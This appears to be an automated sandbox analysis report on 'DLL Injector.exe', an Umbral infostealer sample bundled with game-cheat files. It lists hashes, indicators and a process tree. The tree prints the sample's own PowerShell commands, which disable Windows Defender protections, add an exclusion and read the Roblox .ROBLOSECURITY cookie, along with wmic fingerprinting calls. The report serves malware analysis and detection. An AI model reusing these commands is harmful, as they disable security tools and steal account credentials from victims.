Resubmissions
29-06-2024 16:53  240629-vd8x8s1fqg  10

Analysis
max time kernel: 119s
max time network: 122s
platform: windows7_x64
resource: win7-20240611-en
resource tags: arch:x64 arch:x86 image:win7-20240611-en locale:en-us os:windows7-x64 system
submitted: 29-06-2024 16:53
Behavioral tasks
behavioral1: CheatLoader.js (resource win7-20240508-en)
behavioral2: CheatLoader.js (resource win10v2004-20240611-en)
behavioral3: Complex Softaim Cracked.exe (resource win7-20240419-en)
behavioral4: Complex Softaim Cracked.exe (resource win10v2004-20240508-en)
behavioral5: DLL Injector.exe (resource win7-20240611-en)
General
Target: DLL Injector.exe
Size: 232KB
MD5: 3e87aa76b31c95481d99fb7960ce96f4
SHA1: bcd61df3abd7245df27a250996138675b258f01e
SHA256: 8c18bb102c70d83000ae6d6f784da47b86a78359b2e6edfbfe915cb16ccb9a2a
SHA512: 574d79517027edd422d857272d8a14d751c0b64851e2bd0cf6a698a56284a0b17783a209d405d09542b4c3fc044af2b02304293d4522a169cde8da684350c6dc
SSDEEP: 6144:8loZMLrIkd8g+EtXHkv/iD4rPS0pbhS6F6AxDeebfHb8e1mo5iH/:aoZ0L+EP8rPS0pbhS6F6AxDeebLGH/
Malware Config

Signatures

Detect Umbral payload (1 IoCs)
resource | yara_rule
behavioral5/memory/2200-1-0x0000000000D10000-0x0000000000D50000-memory.dmp | family_umbral

Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid | Process
2256 | powershell.exe

Drops file in Drivers directory (1 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\System32\drivers\etc\hosts | DLL Injector.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
flow | ioc
9 | discord.com
10 | discord.com

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
6 | ip-api.com

Detects videocard installed (1 TTPs, 1 IoCs)
Uses WMIC.exe to determine videocard installed.
pid | Process
644 | wmic.exe

Suspicious behavior: EnumeratesProcesses (6 IoCs)
pid | Process
2200 | DLL Injector.exe
2256 | powershell.exe
2560 | powershell.exe
3000 | powershell.exe
3044 | powershell.exe
2880 | powershell.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 2200 | DLL Injector.exe
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35 | 2684 | wmic.exe
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35 | 2684 | wmic.exe
Token: SeDebugPrivilege | 2256 | powershell.exe
Token: SeDebugPrivilege | 2560 | powershell.exe
Token: SeDebugPrivilege | 3000 | powershell.exe
Token: SeDebugPrivilege | 3044 | powershell.exe
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34 | 1612 | wmic.exe

Suspicious use of WriteProcessMemory (30 IoCs)
description | pid | Process | procid_target | rows
PID 2200 wrote to memory of 2684 | 2200 | DLL Injector.exe | 28 | 3
PID 2200 wrote to memory of 2256 | 2200 | DLL Injector.exe | 31 | 3
PID 2200 wrote to memory of 2560 | 2200 | DLL Injector.exe | 33 | 3
PID 2200 wrote to memory of 3000 | 2200 | DLL Injector.exe | 35 | 3
PID 2200 wrote to memory of 3044 | 2200 | DLL Injector.exe | 37 | 3
PID 2200 wrote to memory of 1612 | 2200 | DLL Injector.exe | 39 | 3
PID 2200 wrote to memory of 1620 | 2200 | DLL Injector.exe | 41 | 3
PID 2200 wrote to memory of 2848 | 2200 | DLL Injector.exe | 43 | 3
PID 2200 wrote to memory of 2880 | 2200 | DLL Injector.exe | 45 | 3
PID 2200 wrote to memory of 644 | 2200 | DLL Injector.exe | 47 | 3
Processes

C:\Users\Admin\AppData\Local\Temp\DLL Injector.exe
  "C:\Users\Admin\AppData\Local\Temp\DLL Injector.exe"  1⤵
  - Drops file in Drivers directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2200

  C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid  2⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2684

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\DLL Injector.exe'  2⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2256

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2  2⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2560

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY  2⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3000

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY  2⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3044

  C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption  2⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1612

  C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory  2⤵
    PID:1620

  C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid  2⤵
    PID:2848

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER  2⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2880

  C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name  2⤵
    - Detects videocard installed
    PID:644
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: e5fb91e7ef66db677958dcb2daf191bd
SHA1: d667502451cd887ed2566669a7afbb277f3cce7c
SHA256: e8f08df6dea577d0866ddaa0ebc6cc361fdbed8da0c26c76c6c87b241c1a5830
SHA512: 2af00fd868fcfb9181a16fb14e935d3d2e6a044fa1e2fac3521322ea54d9de39ddb823c79ed502f35be7b3cc616d82d72e869a364d5ebf3b43731ab45bcecaf7